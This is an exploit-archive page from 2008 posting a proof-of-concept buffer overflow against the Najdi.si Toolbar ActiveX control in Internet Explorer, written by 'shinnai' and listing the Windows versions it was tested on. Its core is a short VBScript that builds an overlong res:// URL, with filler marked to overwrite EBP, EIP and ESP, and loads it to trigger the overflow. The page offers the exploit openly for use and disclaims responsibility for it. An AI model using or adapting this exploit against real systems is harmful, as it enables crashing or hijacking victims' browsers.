Najdi.si Toolbar ActiveX Remote Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Najdi.si Toolbar ActiveX Remote Buffer Overflow PoC
# Published : 2008-08-29
# Author : shinnai
# Previous Title : LogMeIn Remote Access Utility ActiveX Memory Corruption DoS
# Next Title : Micrsoft Windows GDI (CreateDIBPatternBrushPt) Heap Overflow PoC

-----------------------------------------------------------------------------
 Najdi.si Toolbar Remote Buffer Overflow
 url: http://www.najdi.si/

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.

 Tested on:
 Windows XP Professional SP2 with Internet Explorer 6 and 7
 Windows XP Professional SP3 with Internet Explorer 6 and 7
 Windows 2k Professional SP4 with Internet Explorer 6
 Windows Server 2003 SP2 with Internet Explorer 7
-----------------------------------------------------------------------------
<script language='vbscript'>

 mUrl = "res://" + String(260, "a") + "bb" + "cc" + String(512, "d") + "/"
 
 ' "bb" 	=> see EBP
 ' "cc" 	=> see EIP
 ' "ddd..."	=> see ESP

 Document.Location = mUrl

</script>

# www.Syue.com [2008-08-29]